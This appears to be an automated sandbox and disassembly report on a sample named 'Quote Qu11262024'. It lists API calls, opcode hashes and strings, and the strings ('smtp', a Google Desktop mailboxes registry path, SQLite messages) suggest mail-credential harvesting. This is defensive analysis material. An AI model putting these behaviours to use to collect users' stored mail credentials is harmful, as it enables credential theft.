                                                                                                    • Snapshot File: hcaresult_7_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpy$memset
                                                                                                    • String ID: winWrite1$winWrite2
                                                                                                    • API String ID: 438689982-3457389245
                                                                                                    • Opcode ID: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                                                                                                    • Instruction ID: c2532708ffcca3880dfc28061b61c902a2330187b6102c2a8a28e688d44e82e0
                                                                                                    • Opcode Fuzzy Hash: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                                                                                                    • Instruction Fuzzy Hash: 86418072A00209EBDF00DF95CC85BDE7775FF85315F14411AE924A7280D778EAA4CB99
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2618702711.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2618702711.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2618702711.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpymemset
                                                                                                    • String ID: winRead
                                                                                                    • API String ID: 1297977491-2759563040
                                                                                                    • Opcode ID: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                                                                                                    • Instruction ID: 3ec02e552038d814b148e8dc6d2e6fcfdb14063e9eab1ef980803e4d567ed084
                                                                                                    • Opcode Fuzzy Hash: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                                                                                                    • Instruction Fuzzy Hash: DC31C372A00218ABDF10DF69CC46ADF776AEF84314F184026FE14DB241D334EE948BA9
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0044955B
                                                                                                    • memset.MSVCRT ref: 0044956B
                                                                                                    • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,00000000,?,00000000), ref: 004495C8
                                                                                                    • memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00449616
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2618702711.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2618702711.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2618702711.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpymemset
                                                                                                    • String ID: gj
                                                                                                    • API String ID: 1297977491-4203073231
                                                                                                    • Opcode ID: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                                                                                                    • Instruction ID: 902d5c3a1247e7abcff0c4a84da7d54d3a467651d8a5431b25503c8ae0e770b6
                                                                                                    • Opcode Fuzzy Hash: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                                                                                                    • Instruction Fuzzy Hash: AF216A733443402BF7259A3ACC41B5B775DDFCA318F16041EF68A8B342E67AEA058715
                                                                                                    APIs
                                                                                                    • GetParent.USER32(?), ref: 004090C2
                                                                                                    • GetWindowRect.USER32(?,?), ref: 004090CF
                                                                                                    • GetClientRect.USER32(00000000,?), ref: 004090DA
                                                                                                    • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 004090EA
                                                                                                    • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00409106
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2618702711.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2618702711.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2618702711.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$Rect$ClientParentPoints
                                                                                                    • String ID:
                                                                                                    • API String ID: 4247780290-0
                                                                                                    • Opcode ID: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                                                                                    • Instruction ID: bdfce0b549e0f997c013470e25be1f804495b962c90005f3873202e4793523b9
                                                                                                    • Opcode Fuzzy Hash: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                                                                                    • Instruction Fuzzy Hash: 6A012D36801129BBDB119FA59C89EFFBFBCFF46750F044125FD05A2141D77455018BA5
                                                                                                    APIs
                                                                                                      • Part of subcall function 00407107: memset.MSVCRT ref: 00407127
                                                                                                      • Part of subcall function 00407107: GetClassNameA.USER32(?,00000000,000000FF), ref: 0040713A
                                                                                                      • Part of subcall function 00407107: _strcmpi.MSVCRT ref: 0040714C
                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 0041079E
                                                                                                    • GetSysColor.USER32(00000005), ref: 004107A6
                                                                                                    • SetBkColor.GDI32(?,00000000), ref: 004107B0
                                                                                                    • SetTextColor.GDI32(?,00C00000), ref: 004107BE
                                                                                                    • GetSysColorBrush.USER32(00000005), ref: 004107C6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2618702711.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2618702711.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2618702711.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Color$BrushClassModeNameText_strcmpimemset
                                                                                                    • String ID:
                                                                                                    • API String ID: 2775283111-0
                                                                                                    • Opcode ID: 30732ddb99e3546892e286b48803550164489c166bef4c71f88bf4e2e56830df
                                                                                                    • Instruction ID: 687cb18978465a3feaaa07aa3b8de37e8775815fe2b8de28c5581ef0bdca0d30
                                                                                                    • Opcode Fuzzy Hash: 30732ddb99e3546892e286b48803550164489c166bef4c71f88bf4e2e56830df
                                                                                                    • Instruction Fuzzy Hash: AAF03135101109BBCF112FA5DC49ADE3F25EF05711F14812AFA25A85F1CBB5A990DF58
                                                                                                    APIs
                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004147CE
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2618702711.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2618702711.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2618702711.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                    • String ID: winSeekFile$winTruncate1$winTruncate2
                                                                                                    • API String ID: 885266447-2471937615
                                                                                                    • Opcode ID: 3989f365befeb7fb84bae78e7a4911c3188eb7aafc144da4ed62710c54f6e9f9
                                                                                                    • Instruction ID: 76c2d8f9c45a6ab14154b13c081d04d7f34c1e3f6c53ca943db3ce1179081271
                                                                                                    • Opcode Fuzzy Hash: 3989f365befeb7fb84bae78e7a4911c3188eb7aafc144da4ed62710c54f6e9f9
                                                                                                    • Instruction Fuzzy Hash: 5C313175600700AFE720AF65CC41EABB7E8FB88715F104A2EF965932D1D734E8808B29
                                                                                                    APIs
                                                                                                    • _strcmpi.MSVCRT ref: 0040E134
                                                                                                    • _strcmpi.MSVCRT ref: 0040E14D
                                                                                                    • _mbscpy.MSVCRT(?,smtp,0040DE7F,0040DE7F,?,?,00000000,000000FF), ref: 0040E19A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2618702711.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2618702711.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2618702711.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _strcmpi$_mbscpy
                                                                                                    • String ID: smtp
                                                                                                    • API String ID: 2625860049-60245459
                                                                                                    • Opcode ID: 407fd4cd9c5cafa87f943c7cdde1874e153e025f22c42b823323a6ce76bf96c9
                                                                                                    • Instruction ID: 1dd5f7db1b4edf1a80ad81ce147274c535078e8a2a303909ef95c05f23963bac
                                                                                                    • Opcode Fuzzy Hash: 407fd4cd9c5cafa87f943c7cdde1874e153e025f22c42b823323a6ce76bf96c9
                                                                                                    • Instruction Fuzzy Hash: DB11C872500219ABEB10AB66CC41A8A7399EF40358F10453BE945F71C2EF39E9698B98
                                                                                                    APIs
                                                                                                      • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                                                                                    • memset.MSVCRT ref: 00408258
                                                                                                      • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082A6
                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082C3
                                                                                                    Strings
                                                                                                    • Software\Google\Google Desktop\Mailboxes, xrefs: 00408230
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2618702711.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2618702711.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2618702711.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Close$EnumOpenmemset
                                                                                                    • String ID: Software\Google\Google Desktop\Mailboxes
                                                                                                    • API String ID: 2255314230-2212045309
                                                                                                    • Opcode ID: cc5d6d64aea0813188cde2f76db8480d49896f172f032d850e05fd1d4fe80f83
                                                                                                    • Instruction ID: e7ff4aa50d33639bacb2d5000aefce928628a80d8311d3545e17288fa3d3d8ee
                                                                                                    • Opcode Fuzzy Hash: cc5d6d64aea0813188cde2f76db8480d49896f172f032d850e05fd1d4fe80f83
                                                                                                    • Instruction Fuzzy Hash: 9D118F72408345ABD710EE51DC01EABBBACEFD0344F04093EBD9491091EB75D958C6AA
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0040C28C
                                                                                                    • SetFocus.USER32(?,?), ref: 0040C314
                                                                                                      • Part of subcall function 0040C256: PostMessageA.USER32(?,00000415,00000000,00000000), ref: 0040C265
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2618702711.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2618702711.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2618702711.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FocusMessagePostmemset
                                                                                                    • String ID: S_@$l
                                                                                                    • API String ID: 3436799508-4018740455
                                                                                                    • Opcode ID: e2b80c6bc645313a4292a5829f5b0635f9a789c9535e0ddf74fc40c289d6b9ff
                                                                                                    • Instruction ID: f4172cee4733ded4edf5c13384372fb960b3a31eee454cf66b40e3553cb76095
                                                                                                    • Opcode Fuzzy Hash: e2b80c6bc645313a4292a5829f5b0635f9a789c9535e0ddf74fc40c289d6b9ff
                                                                                                    • Instruction Fuzzy Hash: 1411A172900158CBDF219B14CD457DE7BB9AF81308F0800F5E94C7B296C7B45A89CFA9
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2618702711.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2618702711.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2618702711.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _mbscpy
                                                                                                    • String ID: C^@$X$ini
                                                                                                    • API String ID: 714388716-917056472
                                                                                                    • Opcode ID: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                                                                                                    • Instruction ID: 848b4a5d233ab05c703a0d630411b91f0640a461eb42b4d170138ac17b774cf5
                                                                                                    • Opcode Fuzzy Hash: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                                                                                                    • Instruction Fuzzy Hash: F601B2B1D002489FDB50DFE9D9856CEBFF4AB08318F10802AE415F6240EB7895458F59
                                                                                                    APIs
                                                                                                      • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                                                                                      • Part of subcall function 00406FC7: _mbscpy.MSVCRT(?,00000000,?,00000000,0000003C,00000000,?,0040709F,Arial,0000000E,00000000), ref: 00407011
                                                                                                    • CreateFontIndirectA.GDI32(?), ref: 0040101F
                                                                                                    • SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040103E
                                                                                                    • SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 0040105B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2618702711.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2618702711.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2618702711.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ItemMessageSend$CreateFontIndirect_mbscpymemset
                                                                                                    • String ID: MS Sans Serif
                                                                                                    • API String ID: 3492281209-168460110
                                                                                                    • Opcode ID: fba1b153f1476fe7d17889d81f23932038493b3a6f8049a49ffc4c2ea38943aa
                                                                                                    • Instruction ID: 97d77737ff66efe52178e6fda6de2dc92fca71035f8b3f8e7b76904d62d162b3
                                                                                                    • Opcode Fuzzy Hash: fba1b153f1476fe7d17889d81f23932038493b3a6f8049a49ffc4c2ea38943aa
                                                                                                    • Instruction Fuzzy Hash: F5F02775A4130477E7317BA0EC47F4A3BACAB41B00F044535F652B50E1D2F4A404CB48
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2618702711.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2618702711.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2618702711.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ClassName_strcmpimemset
                                                                                                    • String ID: edit
                                                                                                    • API String ID: 275601554-2167791130
                                                                                                    • Opcode ID: db8b236e199e929443ba679e8cc25b3238d768833fac675e2ea724ace2b39a9c
                                                                                                    • Instruction ID: 4378e7120b76b93f9ba7f3ad81c4d59275eb15acd3879ac3f183c71196eabbb1
                                                                                                    • Opcode Fuzzy Hash: db8b236e199e929443ba679e8cc25b3238d768833fac675e2ea724ace2b39a9c
                                                                                                    • Instruction Fuzzy Hash: ADE09BB2C4016A6AEB21A664DC01FE5776CDF59704F0400B6B945E2081E6A4A6884A95
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2618702711.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2618702711.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2618702711.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: strlen$_mbscat
                                                                                                    • String ID: 3CD
                                                                                                    • API String ID: 3951308622-1938365332
                                                                                                    • Opcode ID: ea07c3cf78fe23fa274cd57f6e103936ddd3628895d35173825c115ee7dc3945
                                                                                                    • Instruction ID: 1107c6f19d6a4433d5fdc1d3c5cfb72f3531f1d81a70b052f8a244d3c085287a
                                                                                                    • Opcode Fuzzy Hash: ea07c3cf78fe23fa274cd57f6e103936ddd3628895d35173825c115ee7dc3945
                                                                                                    • Instruction Fuzzy Hash: 1BD0A77390C2603AE61566167C42F8E5BC1CFD433AB15081FF408D1281DA3DE881809D
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2618702711.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2618702711.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2618702711.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memset
                                                                                                    • String ID: rows deleted
                                                                                                    • API String ID: 2221118986-571615504
                                                                                                    • Opcode ID: b98c805d9f7a15f03bb69ae15e6c6b0a921ed9a197951f9464e59faa98c73a57
                                                                                                    • Instruction ID: 17dfb349c3cd8fc2c2490db290532cf881f14abfa8d6012d9aa572d9710d7201
                                                                                                    • Opcode Fuzzy Hash: b98c805d9f7a15f03bb69ae15e6c6b0a921ed9a197951f9464e59faa98c73a57
                                                                                                    • Instruction Fuzzy Hash: D5028171E00218AFDF14DFA5D981AEEBBB5FF08314F14005AF914B7291D7B9AA41CBA4
                                                                                                    APIs
                                                                                                      • Part of subcall function 004073B3: memset.MSVCRT ref: 004073C1
                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433A0
                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000020,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433BE
                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433D9
                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443402
                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443426
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2618702711.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2618702711.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2618702711.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ??2@$memset
                                                                                                    • String ID:
                                                                                                    • API String ID: 1860491036-0
                                                                                                    • Opcode ID: 5d3be79d398e0043749495dd296c093f7ddeccd389f7318e4c6f9d3722586f48
                                                                                                    • Instruction ID: bd2fcbe50e3d5b8ec1466eca70e60fda3411ba7e10a355e4f398212a99dd52d4
                                                                                                    • Opcode Fuzzy Hash: 5d3be79d398e0043749495dd296c093f7ddeccd389f7318e4c6f9d3722586f48
                                                                                                    • Instruction Fuzzy Hash: 973162B09107508FE751DF3A8845A16FBE4FF80B05F25486FD549CB2A2E779E5408B19
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0040D2C2
                                                                                                    • memset.MSVCRT ref: 0040D2D8
                                                                                                    • memset.MSVCRT ref: 0040D2EA
                                                                                                    • memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                                                    • memset.MSVCRT ref: 0040D319
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2618702711.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2618702711.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2618702711.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memset$memcpy
                                                                                                    • String ID:
                                                                                                    • API String ID: 368790112-0
                                                                                                    • Opcode ID: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                                                                                    • Instruction ID: 358c417c53aa398974aae77e4359fd90ac0a4dba5340dfd55ca125e4bb0c9b0b
                                                                                                    • Opcode Fuzzy Hash: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                                                                                    • Instruction Fuzzy Hash: 8E01D8B5A40B406BE235AE25CC03F2AB3A8DF91714F400A2EF692676C1D7B8F509915D
                                                                                                    APIs
                                                                                                    • __allrem.LIBCMT ref: 00425850
                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00425885
                                                                                                    • __allrem.LIBCMT ref: 00425933
                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042597B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2618702711.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2618702711.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2618702711.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                    • String ID:
                                                                                                    • API String ID: 1992179935-0
                                                                                                    • Opcode ID: eeae426aa4a2dd52bce4edc8b714b0ba45551b1196620555c2276823dfb77c6c
                                                                                                    • Instruction ID: 2fc5b562d87482ee0bf7138f77baf3e4365ffd42061eb2d4d5abd72185a9e376
                                                                                                    • Opcode Fuzzy Hash: eeae426aa4a2dd52bce4edc8b714b0ba45551b1196620555c2276823dfb77c6c
                                                                                                    • Instruction Fuzzy Hash: C96180B1A00A29DFCF149B64D840AAEB7B1FF45320F68815AE548AB391D7389D81CF19
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    • variable number must be between ?1 and ?%d, xrefs: 0042C5C2
                                                                                                    • too many SQL variables, xrefs: 0042C6FD
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2618702711.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2618702711.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2618702711.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memset
                                                                                                    • String ID: too many SQL variables$variable number must be between ?1 and ?%d
                                                                                                    • API String ID: 2221118986-515162456
                                                                                                    • Opcode ID: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                                                                                                    • Instruction ID: 69d39437184f158b69242413db2932325e78deb4f0df02558d14bae7a1bb2b74
                                                                                                    • Opcode Fuzzy Hash: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                                                                                                    • Instruction Fuzzy Hash: 93518B31B00626EFDB29DF68D481BEEB7A4FF09304F50016BE811A7251D779AD51CB88
                                                                                                    APIs
                                                                                                      • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000,?,?,00000400,00000001), ref: 004026E4
                                                                                                    • memset.MSVCRT ref: 004026AD
                                                                                                      • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                                                                                                      • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                                                                                                      • Part of subcall function 004108E5: memcpy.MSVCRT(?,00000000,?,00000001,?,?,?,00000000), ref: 00410961
                                                                                                      • Part of subcall function 004108E5: CoTaskMemFree.COMBASE(00000000), ref: 00410970
                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000002,?,0000007F,00000000,00000000,00000002,00000000,?), ref: 0040279C
                                                                                                    • LocalFree.KERNEL32(?), ref: 004027A6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2618702711.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2618702711.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2618702711.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharFreeFromMultiStringUuidWide$LocalQueryTaskValuememcpymemset
                                                                                                    • String ID:
                                                                                                    • API String ID: 3503910906-0
                                                                                                    • Opcode ID: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                                                                                                    • Instruction ID: aa14e43d8b473801bf9d2631992dc1640396fa6537153de3cc175e43cdbeb3f4
                                                                                                    • Opcode Fuzzy Hash: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                                                                                                    • Instruction Fuzzy Hash: 0B4183B1408384BFD711DB60CD85AAB77D8AF89314F044A3FF998A31C1D679DA44CB5A
                                                                                                    APIs
                                                                                                      • Part of subcall function 00409DED: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000), ref: 00409E0E
                                                                                                      • Part of subcall function 00409DED: ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000), ref: 00409ED5
                                                                                                    • strlen.MSVCRT ref: 0040B60B
                                                                                                    • atoi.MSVCRT(?,00000000,?,76230A60,?,00000000), ref: 0040B619
                                                                                                    • _mbsicmp.MSVCRT ref: 0040B66C
                                                                                                    • _mbsicmp.MSVCRT ref: 0040B67F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2618702711.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2618702711.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2618702711.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
